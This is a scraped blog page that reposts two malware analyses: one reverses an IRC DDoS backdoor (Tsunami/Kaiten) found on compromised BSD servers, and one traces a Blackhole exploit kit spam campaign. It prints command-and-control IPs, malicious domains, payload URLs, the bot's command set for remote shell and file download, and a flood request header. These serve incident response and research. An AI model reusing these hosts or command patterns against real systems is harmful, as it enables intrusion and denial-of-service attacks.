RSS Feed
Twitter
The hpHOSTS Hosts file has been updated. There is now a total of 193,822 listed hostsnames.If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)Latest Updated: 01/06/2013 03:00Last Verified: 01/06/2013 00:00Download hpHosts now!http://hosts-file.net/?s=Download
This is featured post 1 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
This is featured post 2 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
This is featured post 3 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
Thứ Sáu, 31 tháng 5, 2013
Thứ Năm, 30 tháng 5, 2013
04:53
nam tóc xù
*) I dedicate this writing to fellow UNIX admins who dedicate an hourless hard effort for making sure our internet services up and running. #RESPECT!
Snapshot:
In most machines we got no infection trace on this binary, but one machine which has snapshots leaving a compile trails in logs at a mirror backup storage:
(Seek the source everywhere but couldn't find it.. must be deleted..)
Section Headers:
All of the further hack was implemented via FTP and HTTP used for flood.
For the FTP, it tries to get some stuff in the below host:
Snapshot:
Summary
Sadly, some strong waves of malware attacks on UNIX systems has started early this year. We still remember the rush from the Darkleech Rogue Apache Module, goes to Linux cDorked Rogue httpd, to the implementation of rogue web server binaries on other popular web servers like NGNIX and other web servers.
Today I was asked to help fellow unixmen who maintain services based on a generic xBSD which detected some strange activities on IRC port access from several online machines. I was not hoping to see the cDorked or Darkleech new samples or common Linux threat on this one, as a FreeBSD users & fan I know how good the security is, but I guess I was wrong.
This case is actually a same old flaw's story: looks like the system was exploited via web admin panel abuse by HTTP access (sorry, can not tell you which web panel right now) using the tools that can send rapid packet fetch/wget requests (later on we know that the malware discussed here also have that function), the root privilege was gained via crontab UID (root, indeed), and practically overall server's security was compromised from that hole. And the bad guys was compiling nasty downloader/IRC Bot backdoor (known previously named as TSUNAMI) with deleting all source traces+logs related, thus run & hide its service using the fake bash process (ever see a BSD system with bash shell process before? *smile*).
First Handle Analysis
I think is important to share this experience on what to do at the time like this, so I dare myself to write it, with hoping not to step on other's toes. The rule is simple, if they took the root & we take the service offline, no matter what.
OK, shortly, went to the system to find the strange "-bash" process was running:
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMANDI quickly listen (netstat) to the outbounds to find that the irc ports was trying to be connected:
root 96606 0.0 0.2 95939 1096 ?? Ss 28Feb13 0:19.87 -bash
Active Internet connectionsAnd all of the sudden, frequently the FTP access was coming up:
Proto Recv-Q Send-Q Local Address Foreign Address (state)
----------------------------------------------------------------------------
// for IRC....
tcp4 0 0 x.x.x.x.59314 188.190.124.81.ircd SYN_SENT
tcp4 0 0 x.x.x.x.60606 188.190.124.81.ircd SYN_SENT
tcp4 0 0 x.x.x.x.46914 188.190.124.81.ircd SYN_SENT
tcp4 0 0 x.x.x.x.53001 188.190.124.81.ircd SYN_SENT
tcp4 0 0 x.x.x.x.50123 188.190.124.81.ircd SYN_SENT
tcp4 0 0 x.x.x.x.36833 188.190.124.81.ircd SYN_SENT
[...]
Active Internet connectionsJust to be sure, firing lsof on other compromised machine for confirming, and found the same condition:
Proto Recv-Q Send-Q Local Address Foreign Address (state)
----------------------------------------------------------------------------
// for FTP....
tcp4 0 0 x.x.x.x.64873 wf.networksoluti.ftp SYN_SENT
tcp4 0 0 x.x.x.x.64873 wf.networksoluti.ftp SYN_SENT
[...]
-bash 95939 root cwd VDIR 0,99 1024 869616 /{Directory of the malware}
-bash 95939 root rtd VDIR 0,99 1024 2 /
-bash 95939 root txt VREG 0,99 18902 870081 {Directory of the malware}/-bash
-bash 95939 root txt VREG 0,99 229192 94984 /libexec/ld-elf.so.1
-bash 95939 root txt VREG 0,99 1172708 615898 /lib/libc.so.7
-bash 95939 root 0u VCHR 0,105 0t31989 105 /dev/pts/0
-bash 95939 root 1u VCHR 0,105 0t31989 105 /dev/pts/0
-bash 95939 root 2u VCHR 0,105 0t31989 105 /dev/pts/0
-bash 95939 root 3u VREG 0,99 0 539122 "/tmp/tan.pid"
-bash 95939 root 4u IPv4 0xc38b4560 0t0 "TCP x.x.x.x:65114->188.190.124.81:ircd (SYN_SENT)"
[...]This is never be good since all of the requests coming fromthe PID of that "-bash". So I took procedure to take machine offline and continue the analysis. This is the binary responsible to this disaster, saved in the $TMP:
$ ls -alFComparing the dates of process and file time-stamp will lead you to /dev/null so just ignore those and stick to the logs and dumps that might occurred for any traces(if we lucky).
-rwxr-xr-x 1 xxx xxx 18902 May 02 15:11 -bash*
In most machines we got no infection trace on this binary, but one machine which has snapshots leaving a compile trails in logs at a mirror backup storage:
k.c:91: warning: conflicting types for built-in function 'pow'Aha, it seems that someone compiled this, you see that the source was in C/C++..
k.c:586:2: warning: no newline at end of file
(Seek the source everywhere but couldn't find it.. must be deleted..)
At that point I got no other options but to tear it. apart.. So here we go;
Binary Analysis
Binary structure, is an ELF:
file format elf32-i386The ELF header:
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x08048d20
ELF Header:Hex:
Magic: 7f 45 4c 46 01 01 01 09 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - FreeBSD
ABI Version: 0
Type: EXEC (Executable file)
Machine: Intel 80386
Version: 0x1
Entry point address: 0x8048d20
Start of program headers: 52 (bytes into file)
Start of section headers: 13864 (bytes into file)
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 8
Size of section headers: 40 (bytes)
Number of section headers: 28
Section header string table index: 25
0000 7F 45 4C 46 01 01 01 09 00 00 00 00 00 00 00 00 .ELF............I'd say the attacker are not preparing to aim FreeBSD but they just lucky to get the ones with the good Linux compatibility.
0010 02 00 03 00 01 00 00 00 20 8D 04 08 34 00 00 00 ........ ...4...
0020 28 36 00 00 00 00 00 00 34 00 20 00 08 00 28 00 (6......4. ...(.
0030 1C 00 19 00 06 00 00 00 34 00 00 00 34 80 04 08 ........4...4...
0040 34 80 04 08 00 01 00 00 00 01 00 00 05 00 00 00 4...............
0050 04 00 00 00 03 00 00 00 34 01 00 00 34 81 04 08 ........4...4...
0060 34 81 04 08 15 00 00 00 15 00 00 00 04 00 00 00 4...............
0070 01 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 ................
0080 00 80 04 08 94 30 00 00 94 30 00 00 05 00 00 00 .....0...0......
0090 00 10 00 00 01 00 00 00 94 30 00 00 94 C0 04 08 .........0......
00A0 94 C0 04 08 6C 02 00 00 10 09 00 00 06 00 00 00 ....l...........
00B0 00 10 00 00 02 00 00 00 A8 30 00 00 A8 C0 04 08 .........0......
00C0 A8 C0 04 08 C8 00 00 00 C8 00 00 00 06 00 00 00 ................
00D0 04 00 00 00 04 00 00 00 4C 01 00 00 4C 81 04 08 ........L...L...
00E0 4C 81 04 08 18 00 00 00 18 00 00 00 04 00 00 00 L...............
00F0 04 00 00 00 50 E5 74 64 48 30 00 00 48 B0 04 08 ....P.tdH0..H...
0100 48 B0 04 08 14 00 00 00 14 00 00 00 04 00 00 00 H...............
0110 04 00 00 00 51 E5 74 64 00 00 00 00 00 00 00 00 ....Q.td........
0120 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 ................
0130 04 00 00 00 2F 6C 69 62 65 78 65 63 2F 6C 64 2D ..../libexec/ld-
0140 65 6C 66 2E 73 6F 2E 31 00 00 00 00 08 00 00 00 elf.so.1........
Dynamic Section:
(Why I always seek this section? because:Let's check the sections:
the dependent binaries and functions for the linker are here)
NEEDED libc.so.7
INIT 0x8048a00
FINI 0x804a97c
HASH 0x8048164
STRTAB 0x804864c
SYMTAB 0x80482dc
STRSZ 0x196
SYMENT 0x10
DEBUG 0x0
PLTGOT 0x804c170
PLTRELSZ 0x178
PLTREL 0x11
JMPREL 0x8048888
REL 0x8048870
RELSZ 0x18
RELENT 0x8
VERNEED 0x8048850
VERNEEDNUM 0x1
VERSYM 0x80487e2
[...]
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf AlTips for the unknown system: Is important to see the comments, to be sure it was compiled in the victim's environment (I did this to all infected m/c samples)
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .interp PROGBITS 08048134 000134 000015 00 A 0 0 1
[ 2] .note.ABI-tag NOTE 0804814c 00014c 000018 00 A 0 0 4
[ 3] .hash HASH 08048164 000164 000178 04 A 4 0 4
[ 4] .dynsym DYNSYM 080482dc 0002dc 000370 10 A 5 1 4
[ 5] .dynstr STRTAB 0804864c 00064c 000196 00 A 0 0 1
[ 6] .gnu.version VERSYM 080487e2 0007e2 00006e 02 A 4 0 2
[ 7] .gnu.version_r VERNEED 08048850 000850 000020 00 A 5 1 4
[ 8] .rel.dyn REL 08048870 000870 000018 08 A 4 0 4
[ 9] .rel.plt REL 08048888 000888 000178 08 A 4 11 4
[10] .init PROGBITS 08048a00 000a00 000011 00 AX 0 0 4
[11] .plt PROGBITS 08048a14 000a14 000300 04 AX 0 0 4
[12] .text PROGBITS 08048d20 000d20 001c5c 00 AX 0 0 16
[13] .fini PROGBITS 0804a97c 00297c 00000c 00 AX 0 0 4
[14] .rodata PROGBITS 0804a988 002988 0006bf 00 A 0 0 4
[15] .eh_frame_hdr PROGBITS 0804b048 003048 000014 00 A 0 0 4
[16] .eh_frame PROGBITS 0804b05c 00305c 000038 00 A 0 0 4
[17] .ctors PROGBITS 0804c094 003094 000008 00 WA 0 0 4
[18] .dtors PROGBITS 0804c09c 00309c 000008 00 WA 0 0 4
[19] .jcr PROGBITS 0804c0a4 0030a4 000004 00 WA 0 0 4
[20] .dynamic DYNAMIC 0804c0a8 0030a8 0000c8 08 WA 5 0 4
[21] .got.plt PROGBITS 0804c170 003170 0000c8 04 WA 0 0 4
[22] .data PROGBITS 0804c240 003240 0000c0 00 WA 0 0 32
[23] .bss NOBITS 0804c300 003300 0006a4 00 WA 0 0 32
[24] .comment PROGBITS 00000000 003300 000248 00 0 0 1
[25] .shstrtab STRTAB 00000000 003548 0000e0 00 0 0 1
[26] .symtab SYMTAB 00000000 003a88 000950 10 27 48 4
[27] .strtab STRTAB 00000000 0043d8 0005fe 00 0 0 1
// Contents of section .comment:By firing rabin I got the imports symbol:
0000 00244672 65654253 443a2072 656c656e .$FreeBSD: relen
0010 672f392e 302f6c69 622f6373 752f6933 g/9.0/lib/csu/i3
0020 38362d65 6c662f63 7274315f 732e5320 86-elf/crt1_s.S
0030 32313733 38332032 3031312d 30312d31 217383 2011-01-1
0040 33203233 3a30303a 32325a20 6b696220 3 23:00:22Z kib
0050 24000024 46726565 4253443a 2072656c $..$FreeBSD: rel
[Imports]And these are malicious command activities used:
48 imports /* <======== noted */
_Jv_RegisterClasses
__error
__inet_addr
_init_tls
atexit
bcopy
close
[...]
gethostbyname connectGot some traces on HTTP connectivity:
sleep setsockopt
fopen vsprintf
time __isthreaded
strtok write
environ flock
socket fork
free srand
popen strdup
strcpy [...]
[...]
http://IRC Messages:
cvv4you.ru // hosts...
188.190.124.120
GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
Host: %s:80
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
PRIVMSG %s :GETIRC Commands:
PRIVMSG %s :Unable to create socket.
PRIVMSG %s :Unable to resolve address.
PRIVMSG %s :Unable to connect to http.
PRIVMSG %s :Receiving file.Traces of read/write strings manipulation in C/Unix:
PRIVMSG %s :Saved as %s
PRIVMSG %s :NICK <nick>
PRIVMSG %s :Nick cannot be larger than 9 characters.
NICK %s
PRIVMSG %s :Unable to resolve %s
PRIVMSG %s :MOVE <server>
NOTICE %s :NICK <nick> = Changes the nick of the client
NOTICE %s :SERVER <server> = Changes servers
NOTICE %s :KILL = Kills the client
NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd
NOTICE %s :HELP = Displays this
NOTICE %s :IRC <command> = send_msgs this command to the server
NOTICE %s :SH <command> = Executes a command
NICK
SERVER
KILL
HELP
IRC
PRIVMSG %s :%s
MODE %s -ix
NICK %s
JOIN %s :%s
WHO %s
PONG %s
PRIVMSG %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
PRIVMSG
PING
fputcAt this point also I saw the PID control traces:
fgets
// PID hooks:I confirmed the the admins that infected xBSD systems wasn't affected but on linux the below system commands will exactly bring a chaos:
waitpid
/tmp/tan.pid
Lockfile found. Exiting.
- bash // malware process..
export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%sBut these commands does:
gethostbyname
kill
environ
A quick Reversing
Practically, if you do up to the above steps then you can make a very good report about this incident, is just to my curiosity I reversed it to find the important functions used below:
Messaging..
// ref: unix socket programmingA self-lookups...
// send_msg uses a global variable buffer
# 08048fc0 <send_msg>:
08048fc0: push %ebp
08048fc1: mov %esp,%ebp
08048fc3: sub $0x28,%esp
08048fc6: lea 0x10(%ebp),%eax
08048fc9: mov %eax,-0x4(%ebp)
08048fcc: mov -0x4(%ebp),%eax
08048fcf: mov %eax,0x8(%esp)
08048fd3: mov 0xc(%ebp),%eax
08048fd6: mov %eax,0x4(%esp)
08048fda: movl $0x804c340,(%esp)
08048fe1: call 0x08048c74 <vsprintf@plt>
08048fe6: movl $0x804c340,(%esp)
08048fed: call 0x08048b84 <strlen@plt>
08048ff2: mov %eax,0x8(%esp)
08048ff6: movl $0x804c340,0x4(%esp)
08048ffe: mov 0x8(%ebp),%eax
08049001: mov %eax,(%esp)
08049004: call 0x08048cf4 <write@plt>
08049009: leave
0804900a: ret
0804900b: nop
# 08049730 <host2ip>:This is how it grab stuff from "mother" remote host:
08049730: push %ebp
08049731: mov %esp,%ebp
08049733: sub $0x28,%esp
08049736: mov 0xc(%ebp),%eax
08049739: mov %eax,(%esp)
0804973c: call 0x08048a94 <__inet_addr@plt>
08049741: mov %eax,0x804c740
08049746: mov 0x804c740,%eax
0804974b: cmp $0xffffffff,%eax
0804974e: jne 0x080497b7 <host2ip+0x87>
08049750: mov 0xc(%ebp),%eax
08049753: mov %eax,(%esp)
08049756: call 0x08048c14 <gethostbyname@plt>
0804975b: mov %eax,-0x4(%ebp)
0804975e: cmpl $0x0,-0x4(%ebp)
08049762: jne 0x08049793 <host2ip+0x63>
08049764: mov 0x804c760,%eax
08049769: mov 0xc(%ebp),%edx
0804976c: mov %edx,0xc(%esp)
08049770: mov 0x8(%ebp),%edx
08049773: mov %edx,0x8(%esp)
08049777: movl $0x804abf8,0x4(%esp)
0804977f: mov %eax,(%esp)
08049782: call 0x08048fc0 <send_msg>
08049787: movl $0x0,(%esp)
0804978e: call 0x08048cb4 <exit@plt>
08049793: mov -0x4(%ebp),%eax
08049796: mov 0xc(%eax),%eax
08049799: mov %eax,%edx
0804979b: mov -0x4(%ebp),%eax
0804979e: mov 0x10(%eax),%eax
080497a1: mov (%eax),%eax
080497a3: mov %edx,0x8(%esp)
080497a7: movl $0x804c740,0x4(%esp)
080497af: mov %eax,(%esp)
080497b2: call 0x08048c44 <bcopy@plt>
080497b7: mov 0x804c740,%eax
080497bc: leave
080497bd: ret
080497be: xchg %ax,%ax
# 080492a0 <get>:Checksum of the grabs...
080492a0: push %ebp
080492a1: mov %esp,%ebp
080492a3: push %ebx
080492a4: sub $0x1454,%esp
080492aa: mov 0xc(%ebp),%eax
080492ad: mov %eax,(%esp)
080492b0: call 0x08049010 <mfork>
080492b5: test %eax,%eax
080492b7: jne 0x0804969e <get+0x3fe>
080492bd: cmpl $0x1,0x10(%ebp)
080492c1: jg 0x080492e9 <get+0x49>
080492c3: mov 0xc(%ebp),%eax
080492c6: mov %eax,0x8(%esp)
080492ca: movl $0x804a9a8,0x4(%esp)
080492d2: mov 0x8(%ebp),%eax
080492d5: mov %eax,(%esp)
080492d8: call 0x08048fc0 <send_msg>
080492dd: movl $0x0,(%esp)
080492e4: call 0x08048cb4 <exit@plt>
080492e9: movl $0x0,0x8(%esp)
080492f1: movl $0x1,0x4(%esp)
080492f9: movl $0x2,(%esp)
08049300: call 0x08048ae4 <socket@plt>
08049305: mov %eax,-0x28(%ebp)
08049308: cmpl $0xffffffff,-0x28(%ebp)
0804930c: jne 0x08049334 <get+0x94>
[...]
# 08049210 <in_cksum>:move stuff to somewhere else...
08049210: push %ebp
08049211: mov %esp,%ebp
08049213: sub $0x1c,%esp
08049216: mov 0xc(%ebp),%eax
08049219: mov %eax,-0x1c(%ebp)
0804921c: mov 0x8(%ebp),%edx
0804921f: mov %edx,-0x18(%ebp)
08049222: movl $0x0,-0x14(%ebp)
08049229: movw $0x0,-0x2(%ebp)
0804922f: jmp 0x08049245 <in_cksum+0x35>
08049231: mov -0x18(%ebp),%edx
08049234: movzwl (%edx),%eax
08049237: movzwl %ax,%eax
0804923a: add %eax,-0x14(%ebp)
0804923d: addl $0x2,-0x18(%ebp)
08049241: subl $0x2,-0x1c(%ebp)
08049245: cmpl $0x1,-0x1c(%ebp)
08049249: jg 0x08049231 <in_cksum+0x21>
0804924b: cmpl $0x1,-0x1c(%ebp)
0804924f: jne 0x08049266 <in_cksum+0x56>
08049251: lea -0x2(%ebp),%edx
08049254: mov -0x18(%ebp),%eax
[...]
# 080497c0 <move>:Termination of self created process (hooked at IRC/FTP timeout retries access)
080497c0: push %ebp
080497c1: mov %esp,%ebp
080497c3: sub $0x18,%esp
080497c6: cmpl $0x0,0x10(%ebp)
080497ca: jg 0x080497f2 <move+0x32>
080497cc: mov 0xc(%ebp),%eax
080497cf: mov %eax,0x8(%esp)
080497d3: movl $0x804ac1a,0x4(%esp)
080497db: mov 0x8(%ebp),%eax
080497de: mov %eax,(%esp)
080497e1: call 0x08048fc0 <send_msg>
080497e6: movl $0x1,(%esp)
080497ed: call 0x08048cb4 <exit@plt>
080497f2: mov 0x14(%ebp),%eax
080497f5: add $0x4,%eax
080497f8: mov (%eax),%eax
080497fa: mov %eax,(%esp)
080497fd: call 0x08048b34 <strdup@plt>
08049802: mov %eax,0x804c888
08049807: movl $0x1,0x804c320
08049811: mov 0x8(%ebp),%eax
08049814: mov %eax,(%esp)
08049817: call 0x08048b54 <close@plt>
0804981c: leave
0804981d: ret
0804981e: xchg %ax,%ax
# 08049820 <killd>:The below are functions related to the (strongly suspected) flood operation:
08049820: push %ebp
08049821: mov %esp,%ebp
08049823: sub $0x8,%esp
08049826: movl $0x9,0x4(%esp)
0804982e: movl $0x0,(%esp)
08049835: call 0x08048cc4 <kill@plt>
0804983a: leave
0804983b: ret
0804983c: lea 0x0(%esi),%esi
# 08049010 <mfork>:** For a complete reverse note you'll find it here-->>[Pastebin] **
08049010: push %ebp
08049011: mov %esp,%ebp
08049013: sub $0x18,%esp
08049016: call 0x08048a84 <fork@plt>
0804901b: mov %eax,-0xc(%ebp)
0804901e: cmpl $0x0,-0xc(%ebp)
08049022: jne 0x0804902f <mfork+0x1f>
08049024: mov -0xc(%ebp),%eax
08049027: mov %eax,-0x14(%ebp)
0804902a: jmp 0x080490bb <mfork+0xab>
[...]
# 08049120 <makestring>:
08049120: push %ebp
08049121: mov %esp,%ebp
08049123: push %esi
08049124: push %ebx
08049125: sub $0x30,%esp
08049128: movl $0x9,-0x10(%ebp)
0804912f: mov -0x10(%ebp),%eax
08049132: add $0x1,%eax
08049135: mov %eax,(%esp)
08049138: call 0x08048a24 <malloc@plt>
0804913d: mov %eax,-0x14(%ebp)
08049140: mov -0x10(%ebp),%eax
08049143: add $0x1,%eax
08049146: mov %eax,0x8(%esp)
0804914a: movl $0x0,0x4(%esp)
08049152: mov -0x14(%ebp),%eax
08049155: mov %eax,(%esp)
08049158: call 0x08048c94 <memset@plt>
0804915d: movl $0x0,-0xc(%ebp)
08049164: jmp 0x080491a8 <makestring+0x88>
08049166: mov -0xc(%ebp),%eax
[...]
# 080491c0 <pow>: // we saw the compilation warning on this one.. :-)
080491c0: push %ebp
080491c1: mov %esp,%ebp
080491c3: sub $0xc,%esp
080491c6: cmpl $0x0,0xc(%ebp)
080491ca: jne 0x080491d5 <pow+0x15>
080491cc: movl $0x1,-0x4(%ebp)
080491d3: jmp 0x08049201 <pow+0x41>
080491d5: cmpl $0x1,0xc(%ebp)
080491d9: jne 0x080491e3 <pow+0x23>
080491db: mov 0x8(%ebp),%eax
080491de: mov %eax,-0x4(%ebp)
080491e1: jmp 0x08049201 <pow+0x41>
080491e3: mov 0xc(%ebp),%eax
080491e6: sub $0x1,%eax
[...]
And there are so many more...
What does it do?
Below are the malware functions that I gathered:
Usage the INET socket to make internet connection via IRC, HTTP or FTPPractically, upon started it tries to connect to IRC at below host:
Locking itself in specific PID to avoid double starts/killed.
Forking functionalities.
Remote control Bot-IRC functions like:
a. Remote FTP access for infecting further
b. Commands like: NICK, SERVER, KILL, GET, HELP, ETC, SH; are the basic commmands used
c. Custom commands like; _352, _376, _433 for botnet comm purpose.
d. IMPORTANT! Flooding Operation is implemented in the program, w/ below HTTP header:
......GET /%s HTTP/1.0\
......Connection: Keep-Alive
......User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
......Host: %s:80\
......Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
......Accept-Encoding: gzip\r\nAccept-Language: en
......Accept-Charset: iso-8859-1,*,utf-8
......(Following by long characters assembled via IRC command instructions)
cvv4you.ruIt then wait for the boss to connect, to perform some malicious acts.
188.190.124.120
188.190.124.81
All of the further hack was implemented via FTP and HTTP used for flood.
For the FTP, it tries to get some stuff in the below host:
Hostname: wf.networksolution.com↑There should be some bad stuffs in there.
Address: 205.178.189.131
Sample! Sample!
Yes, since I know how hard it feels for not being shared samples, I am currently waiting for permission to share some samples for research purpose, so please hold on. But right now we're allowed to scan it in Virus Total :-) here's the url >>>Link
Here's the details:
SHA256: 6e4586e5ddf44da412e05543c275e466b9da0faa0cc20ee8a9cb2b2dfd48114e
SHA1: 13aa008b0f3c9e92450979ee52cb46accf49aff3
MD5: 6547b92156b39cb3bb5371b17d2488f2
File size: 18.5 KB ( 18902 bytes )
File name: -bash
File type: ELF
Tags: elf
Detection ratio: 7 / 47
Analysis date: 2013-05-30 11:37:36 UTC ( 4 minutes ago )
F-Secure : Generic.Malware.IFg.985D9435
GData : ELF:Tsunami-L
MicroWorld-eScan : Generic.Malware.IFg.985D9435
Avast : ELF:Tsunami-L [Trj]
Kaspersky : Backdoor.Linux.Tsunami.gen
BitDefender : Generic.Malware.IFg.985D9435
Emsisoft : Generic.Malware.IFg.985D9435 (B)
Additional:
(1) After some research, I found this malware is known by its self compiled method on a hacked machine. Well known as Kaiten a Linux/Unix DDOS IRC Bot←thank's for the @exitthematrix of KM. (2) The similar attack was also found in the site with the Ruby on Rails Web Admin Panel vulnerability posted by Mr. Jeff Jarmoc in his site jarmoc.com, he detected the traces of source code used during compilation of the malware and posted it in his blog here -->>[JARMOC.COM]. After some comparison I found the strong possibility that the same malware code and same bad actor was used in both case. Since the both findings was detected in so near time, I bet there are other servers also under attack with the similar pattern and malware so please check your system regularly.
MalwareMustDie!!
Thứ Tư, 29 tháng 5, 2013
05:47
nam tóc xù
Infection Summary:
Recently we're back into full research, and go straight to all junk mails on campaign that infecting malware. Today I bumped into the malvertisement spam email, which I thought a bit "unusual", as per below: 
Since some of you might see the same sample, so I thought it's worth to explain what happened, unexpectedly it lead me to a complicated analysis. Believe me, this case is worth to dig further, and what I wrote here is a short version of the overall scheme.
The marked link is a redirection page to the Blackhole Landing Page at:
h00p://uninstallingauroras.net/closest/i9jfuhioejskveohnuojfir.phpYou'll be redirected as per below:
h00p://papakarlo24.ru/wp-gdt.php?H00OTWYN3DI3Z4Which lead the user to the PDF exploit download URL of:
Resolving papakarlo24.ru... seconds 0.00, 92.38.227.2
Caching papakarlo24.ru => 92.38.227.2
Connecting to papakarlo24.ru|92.38.227.2|:80... seconds 0.00, connected.
:
GET /wp-gdt.php?H00OTWYN3DI3Z4 h00p/1.0
Host: papakarlo24.ru
h00p request sent, awaiting response...
:
h00p/1.1 302 Moved Temporarily
Server: nginx/0.8.55
Date: Wed, 29 May 2013 08:16:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Location: h00p://uninstallingauroras・net/closest/i9jfuhioejskveohnuojfir.php
Content-Length: 0
:
302 Moved Temporarily
Location: h00p://uninstallingauroras・net/closest/i9jfuhioejskveohnuojfir.php [following]
:
h00p://uninstallingauroras・net/closest/i9jfuhioejskveohnuojfir.php
conaddr is: 92.38.227.2
Resolving uninstallingauroras.net... seconds 0.00, 80.78.247.227
Caching uninstallingauroras.net => 80.78.247.227
h00p://uninstallingauroras.net/closest/i9jfuhioejskveohnuojfir.php?yxt=1n:1j:2w:1m:1i&jnhzkr=2v:3g:30&vzk=1k:1f:2w:1m:31:1o:1l:1l:30:31&jitgppkh=1k:1d:1f:1d:1g:1d:1fHere's the snapshot of those exploits:
h00p://uninstallingauroras.net/closest/i9jfuhioejskveohnuojfir.php?nvxzelny=1n:1j:2w:1m:1i&msiinq=37&hsbvq=1k:1f:2w:1m:31:1o:1l:1l:30:31&kfkojw=1k:1d:1f:1d:1g:1d:1f
Both PDF are Exploit downloader of the malware payload with the below URL:
h00p://uninstallingauroras.net/closest/i9jfuhioejskveohnuojfir.php?orsjgvtp=1n:1j:2w:1m:1i&zxlegtgp=1k:1f:2w:1m:31:1o:1l:1l:30:31&tqdybltx=1h&mryvsc=pcyxjux&sctxbc=lioltyThe reputation for the IP 80.78.247.227 is bad, VirusTotal Passive DNS ((LINK)) reported OTHER landing page URL/domains used:
Latest URLs hosted in this IP address detected by at least oneBack to our case. Here's the payload:
URL scanner or malicious URL dataset:
4/39 2013-05-29 14:08:16 h00p://notablereward.com/closest/i9jfuhioejskveohnuojfir.php
4/39 2013-05-29 13:07:47 h00p://agefsndac.com/closest/i9jfuhioejskveohnuojfir.php
1/38 2013-05-28 18:17:40 h00p://blockedgerman.com/closest/i9jfuhioejskveohnuojfir.php
Latest malware that are detected by at least one antivirus solution and
were downloaded by VirusTotal from the IP address provided:
2/47 2013-05-29 14:08:24 28134f652bbcfddd156423010bd60c481da541271314872ca4b34645dc8c0830
4/47 2013-05-29 00:20:29 71df67ecbd66dce7c66d30bd32b13ae3f0f1c39d24741538f1543c1f71ee8dd0
Sample : ./sample.exeIs on VT already. Looks like we're the number two in finding this:
MD5 : 0d2af51b28138ab79074dedad6c6a00d
SHA256 : 6d41edd7f3964b191d130d16ca8df834874eb4056a7d4287022aa910b3450409
SHA256:Verdict:
6d41edd7f3964b191d130d16ca8df834874eb4056a7d4287022aa910b3450409
SHA1: 5385cc8e975ed8748fe8937853d1eb0f55a34917
MD5: 0d2af51b28138ab79074dedad6c6a00d
File size: 91.5 KB ( 93707 bytes )
File name: sample.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 19 / 47
Analysis date: 2013-05-29 09:09:50 UTC ( 1 hour, 7 minutes ago )
F-Secure : Trojan.GenericKDZ.19645
DrWeb : Trojan.DownLoad3.23197
GData : Trojan.GenericKDZ.19645
Symantec : WS.Reputation.1
AhnLab-V3 : Trojan/Win32.Tepfer
McAfee-GW-Edition : PWS-Zbot-FAQD!0D2AF51B2813
TrendMicro-HouseCall : TROJ_GEN.R47H1ES13
MicroWorld-eScan : Trojan.GenericKDZ.19645
Avast : Win32:Dropper-gen [Drp]
Kaspersky : Trojan-Spy.Win32.Zbot.lvxs
BitDefender : Trojan.GenericKDZ.19645
McAfee : PWS-Zbot-FAQD!0D2AF51B2813
Malwarebytes : Backdoor.Bot.ST
Rising : Win32.Asim.a
Panda : Trj/CI.A
Fortinet : W32/Zbot.LVXS!tr
ESET-NOD32 : Win32/Wigon.PH
Emsisoft : Trojan.Win32.Zbot (A)
Comodo : UnclassifiedMalware
How & from where was it sent from?
↑You'll see a client spambot tool (or MUA) with usually used below signatures to send such malvertisement:
Microsoft SMTP Server id 8.0.685.24;With the below relay characteristic:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.9)
Gecko/20100921 Thunderbird/3.1.4
Received: from unknown (HELO Spammer/FQDN) (Spammer Used MTA IP/x.x.x.x)So we see it was (open or bypassed) relayed via 89.79.81.183, the question is always "how"?
MIME-Version: 1.0
Status: RO
A bit of Exploit Kit & PDF Exploit analysis
It's a Blackhole v2.x, the "/closest/" type, can't afford to make a miss in wacking this one, can be accessed one hit at a time/IP. The "material" needed to grab this is all in the spam email itself. So be sure you know the source of these. Snipped PluginDetect "head" code: 
It used the plugin detect (as always) ver 0.7.9. with weaponized in the PDF exploit infection only as per coded here: 
I used our previously published formula to crack urls: 
Downloading these PDF is as per the accessing the landing page, be careful of your chances. Shortly+frankly, I decoded first PDF for payload URL & runs the second for confirming the link. This is the JS/evil code of the first PDF: 
Just runs it in the PDF/JS environment to get the eval values, contains: BoF: 
CVE-2009-0927 exploit:
Exploit method per varied Adobe versions via plugin detection: 
To hit this shellcode as per encoded (see the decode logic under it) here: 
Shellcode itself is not that special, run the decode part to get this shellcode binary: 
Payload url is at the bottom of it.
For shutdown evidence; the tag of the payload during downloading(log):
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 29 May 2013 08:50:05 GMT
Content-Type: application/x-msdownload
Content-Length: 93707
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: public
Expires: Wed, 29 May 2013 08:50:10 GMT
